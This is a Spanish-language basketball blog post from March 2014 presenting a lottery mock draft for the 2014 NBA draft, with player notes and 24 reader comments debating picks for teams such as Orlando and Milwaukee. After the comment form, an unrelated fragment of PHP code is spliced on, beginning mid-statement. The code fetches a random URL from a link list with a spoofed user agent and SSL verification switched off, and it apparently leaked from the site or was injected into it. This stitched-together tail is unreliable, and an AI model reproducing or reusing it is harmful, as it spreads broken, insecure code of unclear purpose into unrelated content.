Mock Draft 2014 2.0

10 de March de 2014 por Jose_Dantley

embiid-wiggins-parker-randle-smart

Desde nuestro último mock algunas cosas han cambiado, especialmente fuera del top-5 donde, como siempre ocurre, jugadores con los que no se contaba muestran destellos inesperados de calidad, comienzan a asumir más responsabilidades o simplemente aparecen como apuestas seguras conforme la muestra estadística de partidos es mayor.

Extenderemos nuestro mock draft a las posiciones de lotería y realizaremos un análisis de algunos de los jugadores que más nos interesan.

1. Joel Embiid – 7’0″ – Kansas – C

2. Andrew Wiggins – 6’8″ – Kansas – SF

3. Jabari Parker – 6’8″ – Duke – SF/PF

4. Julius Randle – 6’9″ – Kentucky – PF

5. Marcus Smart – 6’4″ – Oklahoma State – PG

6. Dante Exum – 6’6″ – Australia – PG

7. Noah Vonleh – 6’10” – Indiana – PF

8. Dario Saric – 6’10” – Cibona Zagreb – SF/PF

9. Rodney Hood – 6’8″ – Duke – SF

10. Nik Stauskas – 6’6″ – Michigan – SG

11. Doug McDermott – 6’7″ – Creighton – SF

12. Gary Harris – 6’4″ – Michigan State – SG

13. Aaron Gordon – 6’8″ – Arizona – SF/PF

14. Tyler Ennis – 6’2″ – Syracuse – PG

Respecto a nuestro último draft top-10, sale Zach Lavine, que no ha mostrado evolución real y que probablemente permanecerá algún año más en UCLA.

En el top-5, Wiggins ha mostrado más “ganas de baloncesto” que Parker. Aunque ha alternado grandes partidos -el más reciente frente a West Virginia con 41 puntos- con otros en los que ha permanecido casi oculto, el potencial de Wiggins es evidente. Embiid no ha maravillado últimamente e incluso se encuentra en el dique seco probablemente para preparar con garantías la March Madness.

Randle se ha mantenido a buen nivel, lo que unido al altercado que tuvo Marcus Smart hace unos días nos lleva a subirlo a la cuarta posición. Es posible que Smart caiga alguna posición más. No solo su exceso de fogosidad puede ser perjudicial sinó que su tiro sigue sin evolucionar.

Noah Vonleh lo aupamos al séptimo lugar, más que por sus últimas actuaciones -incluso se ha perdido algún partido perdido por lesión-, por el potencial de convertirse en un reboteador espectacular y por mostrar de cuando en cuando que tiene capacidad para ser un buen jugador ofensivo.

Dudas aparte, Saric está en la octava posición porque es muy bueno y algún equipo NBA no dejará pasar la oportunidad. Luego ya sabemos que el ADN balcánico se caracteriza por una explosiva mezcla de aleatoriedad, genialidad, agresividad y locura.

A McDermott lo mantenemos en lotería. Cada vez es más claro que ofensivamente es el mejor y cada vez es también más claro que defensivamente puede ser de los peores. Atención a estas estadísticas: 33 robos y 13 tapones en 4 años de universidad. Wiggins, sin terminar un año, lleva 31/25.

A Aaron Gordon, que dejábamos con mención especial fuera de nuestro top-10, lo incorporamos en el puesto 13. Sin novedades, sigue siendo intenso, sigue apuntando maneras defensivas, sigue siendo limitado en ataque más allá de los 2 metros.

Entran en nuestro draft los siguientes jugadores:

Rodney Hood: Con las lagunas de concentración que muestra Jabari Parker, Rodney Hood se ha convertido en varios partidos en el líder de Duke. En contra jugará su edad, 21 años. Gran tirador y penetrador pero no parece que estemos ante un buen reboteador, algo siempre valorado a la hora de ser draftear un alero en posiciones altas. Quizá una evolución a la posición de escolta sería positiva pero por otro lado podría desvelar aún más las deficiencias en defensa.

Nik Stauskas: Hablo en primera persona del singular para decir que, en estos momentos, es mi jugador favorito del draft. Cuando Stauskas tiene el balón sabes que algo bueno puede pasar. Es un escolta con visión de base, aunque no acaba de tener el manejo suficiente para hacer la transición. Salvando las distancias, en ataque tiene ramalazos de Rudy Fernández. Stauskas es el lama de Michigan tras colaborar el año pasado de manera limitada a la gran campaña del equipo de Trey Burke. Sus 17,3 puntos están conseguidos con una eficiencia descomunal. ¿Por qué no aparece en otros mocks tan arriba? Lo habitual, ¿a quién puede defender Stauskas en la NBA?

Gary Harris: No acabamos de tener clara la transición de Harris a la NBA. A diferencia de Stauskas, Harris necesita muchos tiros para alcanzar sus 17 tiros de media. Físicamente es muy potente, sin alcanzar el nivel Smart, pero le puede ser suficiente. Para subir en los mocks le falta demostrar que tiene potencial de ser un tirador más eficiente.

Tyler Ennis: Reconocemos dudas con Ennis pero el consenso entre los analistas es que Ennis es uno de los bases con el mayor nivel de consistencia y concentración del presente draft. Esta descripción hace siempre acordarnos de Andrés Montes y su apodo para Eric Snow: el obediente, el aplicado. Con Ennis parece que nos encontramos ante un base que puede hacer un poco de todo y que en su primera temporada ya ha demostrado capacidad de liderazgo. Algunos de los puntos débiles coinciden con los de Trey Burke, especialmente en el apartado físico.

Siguientes en la lista: James Young (potencial, pero no despega), Glen Robinson (estancado), Willie Cauley-Stein (sin sangre), Yusuf Nurkic (leñador hábil, escuela yugoslava), Clint Capela (Ibaka 1.1., juega en Francia), Jeremi Grant (un menos prometedor Aaron Gordon)

No te pierdas los próximos días nuestro seguimiento de los posibles drafteados y las previas de la March Madness.

Comenta

24 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Puf, a mí Embiid me parece una barbaridad. Me sorprende muchísimo su actitud y postura defensiva ante forwards y guards. Y hacía mucho que no veía a un tipo tan grande y tan joven moverse así en el poste.

      Citar

  2. Denise dice:
    #2

    Stauskas Top 10?. Bfff..hay que tener muchos bemoles para jugartela por el canadiense con ese pick. Ojo no digo que no valga, ó que vaya a ser un bluff, pero creo que ningun GM va a apostar por él antes del Top 20.
    Por Nurkic si me la jugaría en un Pick 10-14, un 7 pies de 19 años y que ya en el baloncesto porfesional europeo ha demostrado sus credenciales. Tiene pinta de futura estrella.

      Citar

  3. Esteban dice:
    #3

    Andrew Wiggins tiene pinta de ser el clasico jugador que no domina jugando contra jugadores inferiores como los de la NCAA, pero que a la vez no se le mueve un pelo y rinde de la misma manera contra las Mega estrellas de la NBA, caso todo lo contrario a por ejemplo McDermontt

      Citar

  4. Dantley dice:
    #4

    Denise, Nurkic es buena elección. Tiene aspecto de torpón, pero sus movimientos son muy buenos. Quizá es un poco cortocircuitos-mix

    Otro que se me ha pasado es Micic, no sé cómo lo veis,

    Stauskas es pura apuesta. Me encanta el “descaro eficiente”. Pero no defiende, no por falta de actitud, sino porque da la sensación de que no sabe.

    Ojo para el 1 con el tema salud de Embiid. No parece grave pero ya se pierde partidos por la espalda. Si es así, veo a Wiggins nuevamente arriba.

    Y echade un vistazo a videos de Capela. Tengo dudas porque no parece demasiado fuerte, pero qué rapidez con esa altura. Ibaka puede ser demasiado afinar, pero tiene muelles.

      Citar

  5. Viva_Dirk dice:
    #5

    Bien, como en los artículos de seguimiento no pongo ninguna opinión personal tenía ganas de un poco de debate. De los que nombras que han entrado.

    Rodney Hood: Es un draft de muchos aleros, quitando a Parker quizá sea el mejor anotador de todos ellos, tiene un gran rango de tiro y buena capacidad para penetrar, y pierde poquísimos balones. En defensa es demasiado liviano para aleros muy fuertes pero no hay tantos de esos que sean buenos, su defensa cara a cara puede mejorar pero lo malo es que la defensa colectiva(leer lineas de pase, hacer ayudas, etc) no la tiene. Lo veo mas abajo del 9, entre el 12 y el 16.

    Nik Stauskas: Es un lider y tiene un IQ muy grande, pero las dudas físicas son demasiado grandes para verlo tan arriba, comparandolo con Rudy, que está muy bien tirada, el español tiene mas piernas y mas defensa. Deberia adaptarse a jugar de escolta en la NBA aunque también podria hacer de point forward. Creo que saldrá mas cerca del pick 20 que del 10.

    Gary Harris: No me entusiasma pero creo que con la escasez de escoltas saldrá antes que los 2 anteriores. Es buen defensor y en ataque puede adaptarse a un rol con menos balón, el año pasado con menos tiros tuvo mejores porcentajes tanto de 2 como de 3. Salvo que la lotería sea muy generosa con Denver creo que será su elección.

    Tyler Ennis: Tiene bastantes cosas en contra ahora mismo, la primera es que todos los equipos de la zona baja tienen un base titular de garantias o de futuro exceptuando a Lakers y Magics cuyos picks son demasiado altos; lo veo elejido en el segundo pick que tienen los Magics. En lo puramente deportivo, salvo el físico y un poco el tiro el resto lo tiene, es buen distribuidor, manda en la pista y es atrevido.

    Para acabar, McDermott es un buen defensor de equipo, precisamente lo que deciamos de Hood el si lo tiene, aunque por físico no tapone ni robe ni pueda aguantar ala-pivots grandes al poste, creo que el chaval hará un carrerón.

    Ya hablaremos mas detalladamente de todos mas adelante.

      Citar

  6. txusma dice:
    #6

    Los Magic escogerían a Tyler Ennis si antes no se han llevado a Smart, no?

      Citar

  7. Viva_Dirk dice:
    #7

    No veo compatibles a Oladipo y Smart. Ennis puede aportar mucho a un equipo tirando 10 veces o menos por noche, mientras que Smart necesita el balón para hacer su juego.

      Citar

  8. txusma dice:
    #8

    Y Oladipo necesita el balón?

      Citar

  9. Denise dice:
    #9

    La intención de Orlando es pillar a Jabari / Wiggins y en su segundo pick a un base (quizas Ennis). Si Jabari / Wiggins no puede ser porque les toque un pick 4-5, entonces iran a por Smart, que hubiese sido su elección en el pick 2 del año pasado si no se hubiera rajado.

    Oladipo creo que si puede ser compatible con Smart, Vic O no amasa tanta bola, y es verdad que para hacer sus penetraciones, tiene que prepararse su jugada arrancando desde la parte central de la pista a 9 metros, pero tampoco lo veo un jugador egoista.

      Citar

  10. Esteban dice:
    #10

    Oladipo no amasa la bola, ha sido la idea del Magic transformarlo en base y darle para que pique, pero es un 2 fuerte al contragolpe, defendiendo y penetrando en opciones favorables pero esta esta lejos de amasar el balon para sacar su tiro, estilo Melo o J.R. Smith, creo que es hasta la opuesto
    Smart de 1, Oladipo de 2, Harckless de 3, Harris de 4 y Vucavic de 5, a menos que el este mejore mucho el nivel, este equipo deberia luchar por entrar a PO, viendo la conferencia como esta, seria probable

      Citar

  11. Ruxixon dice:
    #11

    Hablando de Smart,hoy partido contra Texas Tech en la primera ronda del torneo de la BIG12,bastante importante para él en particular,pues aunque supongo que el comité invitará a los Cowboys no les vendrá mal hacer un gran torneo.

      Citar

  12. The Wolf dice:
    #12

    Según leo Joel Embiid se ha chafado la espalda y se perdera el “Big 12 tournament” que no se muy bien que es…

      Citar

  13. Melo15 dice:
    #13

    Despues de la temporada regular se hacen una especie de playoffs entre los equipos de cada conferencia.

      Citar

  14. txusma dice:
    #14

    The Wolf:
    Según leo Joel Embiid se ha chafado la espalda y se perdera el “Big 12 tournament” que no se muy bien que es…

    En el artículo resumen de los últimos días de liga regular se explica por encima como va el sistema de competición. Es uno de los torneos que decide el ganador de una conferencia, ganador q va automaticamente a la March Madness.
    Embiid ha decidido descansar de cara a la MM. Veremos en qué queda la lesión.

      Citar

  15. Viva_Dirk dice:
    #15

    txusma:
    Y Oladipo necesita el balón?

    Pues no especialmente, pero no creo que deban darle a un Nº2 del draft un papel tan secundario, que es lo que haría si draftean a Smart. Smart sería la estrella indiscutible del equipo, ya que Vucevic es de mas bajo perfil, con lo que no tengo duda de que andaría rondando los 20 tiros por noche, algo que no es compatible con otro exterior que tenga excesivo protagonismo. Si el papel de Oladipo es ser un Tony Allen está capacitado de sobra, pero puede dar mas y yo no le cortaría las alas de esa manera.

    Orlando tendría muy mala suerte si se ve obligado a coger a Smart, con un pick top3 pilla a uno de los aleros, con un pick 4 puede coger a Randle que es compatible con Vucevic. Un pick 5 sería lo peor, ya que para coger a una incognita total como Exum mejor coger a Smart. Personalmente fuera del top3, si soy el GM de los Magics me tiro de cabeza a por Saric.

      Citar

  16. Ruxixon dice:
    #16

    Viva_Dirk:
    Orlando tendría muy mala suerte si se ve obligado a coger a Smart, con un pick top3 pilla a uno de los aleros, con un pick 4 puede coger a Randle que es compatible con Vucevic. Un pick 5 sería lo peor, ya que para coger a una incognita total como Exum mejor coger a Smart. Personalmente fuera del top3, si soy el GM de los Magics me tiro de cabeza a por Saric.

    Yo intentaría subir como fuera a las posiciones 1-2,ya sea traspasando Afflalo + pick propio,o utilizando los dos picks,un Wiggins o un Parker supone dar el empuje definitivo a la franquicia a cotas que con un Smart o Randle pueden no ser tan grandes.

      Citar

  17. Vader dice:
    #17

    Ruxixon: Yo intentaría subir como fuera a las posiciones 1-2,ya sea traspasando Afflalo + pick propio,o utilizando los dos picks,un Wiggins o un Parker supone dar el empuje definitivo a la franquicia a cotas que con un Smarto Randle pueden no ser tan grandes.

    Yo de Orlando si no pudiera conseguir a Wiggins o Parker me iria directamente al mejor 4 o 5 que quedará disponible en el draft. A menos que tengas un super jugador a tu alcance siempre es mejor utilizar el draft para conseguir buenos pivots. Estos en la agencia libre o via traspaso son muy difíciles de conseguir.

    Saludos

      Citar

  18. Denise dice:
    #18

    Ruxixon: Yo intentaría subir como fuera a las posiciones 1-2,ya sea traspasando Afflalo + pick propio,o utilizando los dos picks,un Wiggins o un Parker supone dar el empuje definitivo a la franquicia a cotas que con un Smarto Randle pueden no ser tan grandes.

    Suponiendo que Orlando pille un pick 3-5, yo no sacrifiría a Afflalo + el pick propio para tener seguro a Wiggins ó Parker. Además esto es un Draft y los jugadores naturalmente están en formación y a lo mejor pillas a un Smart ó Exum en el pick 5 y se convierten en mejores jugadores que Wigg y Parker.
    Lo que no tengo muy claro es que Embiid salga tan arriba, porque, es verdad que si un tio es muy bueno, da igual que su posición esté más que cubierta, se le elige y punto. Pero ummmm los Bucks tienen a Sanders, los 76ers a Noel y los Magic a Vucevic. Para los GM de estos equipos, creo que les es menos quebradero de cabeza pillar directamente en el Draft a un jugador exterior, y no ir a por Embiid para luego tener que traspasar al pivot que ya tienes por un jugador exterior.
    A Lakers y a Boston si que les vendría bien Embiid, y quizas ellos si que podrían sacrificar su propio pick más algun jugador interesante para intercambiarlo por el equipo que posea el pick 1.

      Citar

  19. Txusma dice:
    #19

    Los Bucks draftearían a Embiid e intentarían a engañar a alguien con Sanders. No pillar a Embiid por tener a semejante energúmeno en el equipo sería una tontería.

      Citar

  20. Jose Luis dice:
    #20

    joer que mal te cae Sanders xD

    Vale que ha tenido la mierda de la pelea, pero su temporada pasada fue bastante buena, y en esta ha tenido muchas lesiones, pero no de jugador fragil (codazos en el pomulo por ejemplo) xD

    Yo no sé qué hara cada equipo ni me voy a aventurar, que en esto soy muy malo xddd

      Citar

  21. Dantley dice:
    #21

    En general de acuerdo con las reflexiones de Viva. Discrepamos más en el tema Stauskas pero reconozco que hay mucho de gusto personal en la posición que le he puesto

      Citar

  22. Ruxixon dice:
    #22

    Finalmente Embiid se declara elegible para el próximo draft

      Citar

  23. Txusma dice:
    #23

    Ruxixon:
    Finalmente Embiid se declara elegible para el próximo draft

    Los GM empiezan a respirar. A ver qué pasa con Jabari Parker

      Citar

  24. txusma dice:
    #24

    Tyler Ennis, Kyle Anderson y Zach Lavine también se presentan al draft. A este último no le vendría mal otro año en la universidad y más sin tener a Anderson en el equipo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>